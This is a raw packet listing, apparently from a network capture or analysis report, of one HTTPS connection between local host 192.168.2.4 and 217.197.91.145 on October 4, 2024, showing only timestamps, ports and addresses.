Oct 4, 2024 19:18:17.088407040 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.088459969 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.089072943 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.089090109 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.089144945 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.089159012 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.089205980 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.089987993 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.090006113 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.090064049 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.090078115 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.090130091 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.180460930 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.180507898 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.180598021 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.180613995 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.180639982 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.180669069 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.181444883 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.181487083 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.181525946 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.181539059 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.181564093 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.181583881 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.183163881 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.183208942 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.183244944 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.183258057 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.183284998 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.183309078 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.183859110 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.183898926 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.183934927 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.183952093 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.183974028 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.183999062 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.184801102 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.184844971 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.184879065 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.184890985 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.184916019 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.184941053 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.185879946 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.185919046 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.185954094 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.185966015 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.185990095 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.186007023 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.187016964 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.187068939 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.187100887 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.187118053 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.187143087 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.187179089 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.187932014 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.187977076 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.188008070 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.188020945 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.188050032 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.188086033 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.268807888 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.268882036 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.269098043 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.269098997 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.269141912 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.269200087 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.269395113 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.269454002 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.269488096 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.269501925 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.269527912 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.269551992 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.270486116 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.270536900 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.270576954 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.270590067 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.270616055 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.270638943 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.271378040 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.271440029 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.271459103 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.271471977 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.271502018 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.271531105 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.271895885 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.271948099 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.271977901 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.271991014 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.272016048 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.272061110 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.272886992 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.272929907 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.272963047 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.272975922 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.273003101 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.273020029 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.273585081 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.273637056 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.273669958 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.273683071 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.273709059 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.273729086 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.275042057 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.275084972 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.275114059 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.275125980 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.275151014 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.275173903 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.358617067 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.358675003 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.358714104 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.358747959 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.358768940 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.358792067 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.359302044 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.359349966 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.359363079 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.359402895 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.359383106 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.359471083 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.360270977 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.360312939 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.360332966 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.360346079 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.360363007 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.360393047 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.361115932 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.361161947 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.361181021 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.361192942 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.361222982 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.361238956 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.361968040 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.362010956 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.362132072 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.362132072 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.362164021 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.362207890 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.362673044 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.362726927 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.362746000 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.362756014 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.362786055 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.362797022 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.363770962 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.363826036 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.363846064 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.363853931 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.363883972 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.363910913 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.365309000 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.365329981 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.365379095 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.365386009 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.365418911 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.365438938 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.447964907 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.447997093 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.448247910 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.448282003 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.448339939 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.448997974 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.449019909 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.449075937 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.449089050 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.449116945 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.449137926 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.450511932 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.450535059 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.450588942 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.450603008 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.450629950 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.450649977 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.451222897 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.451241016 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.451287031 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.451301098 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.451325893 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.451348066 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.451782942 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.451807976 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.451853037 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.451864958 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.451889992 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.451913118 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.452764034 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.452783108 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.452853918 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.452867031 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.452917099 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.453227997 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.453252077 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.453300953 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.453313112 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.453337908 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.453377008 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.455014944 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.455037117 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.455087900 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.455100060 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.455142021 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.455158949 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.537091970 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.537120104 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.537350893 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.537369013 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.537414074 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.538192987 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.538217068 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.538260937 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.538269043 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.538299084 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.538316965 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.539644957 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.539665937 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.539733887 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.539741039 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.539782047 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.540560007 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.540579081 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.540615082 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.540623903 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.540663004 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.540677071 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.541182995 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.541202068 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.541239977 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.541248083 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.541275978 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.541291952 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.541819096 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.541838884 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.541876078 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.541884899 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.541912079 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.541937113 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.543052912 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.543080091 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.543112040 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.543118000 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.543148994 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.543165922 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.544537067 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.544554949 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.544611931 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.544620037 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.544662952 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.629419088 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.629458904 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.629502058 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.629524946 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.629558086 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.629595041 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.630127907 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.630150080 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.630193949 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.630207062 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.630232096 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.630265951 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.631540060 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.631560087 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.631603003 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.631616116 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.631643057 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.631659985 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.632216930 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.632239103 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.632278919 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.632291079 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.632318020 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.632347107 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.632868052 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.632890940 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.632936001 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.632947922 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.632972002 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.632992029 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.633552074 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.633573055 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.633614063 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.633625984 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.633651018 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.633671999 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.634358883 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.634380102 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.634432077 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.634443998 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.634470940 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.634488106 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.638062954 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.638086081 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.638163090 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.638175964 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.638226032 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.638226032 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.638976097 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.724694967 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.724770069 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.724793911 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.724803925 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.724838018 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.724858046 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.725373030 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.725421906 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.725436926 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.725462914 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.725488901 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.725507975 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.726305962 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.726347923 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.726372957 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.726381063 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.726412058 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.726429939 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.726643085 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.726692915 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.726711988 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.726718903 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.726746082 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.726763010 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.727494955 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.727540970 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.727608919 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.727617979 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.727689981 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.728334904 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.728383064 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.728437901 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.728446007 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.728507996 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.729417086 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.729458094 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.729486942 CEST	49843	443	192.168.2.4	217.197.91.145
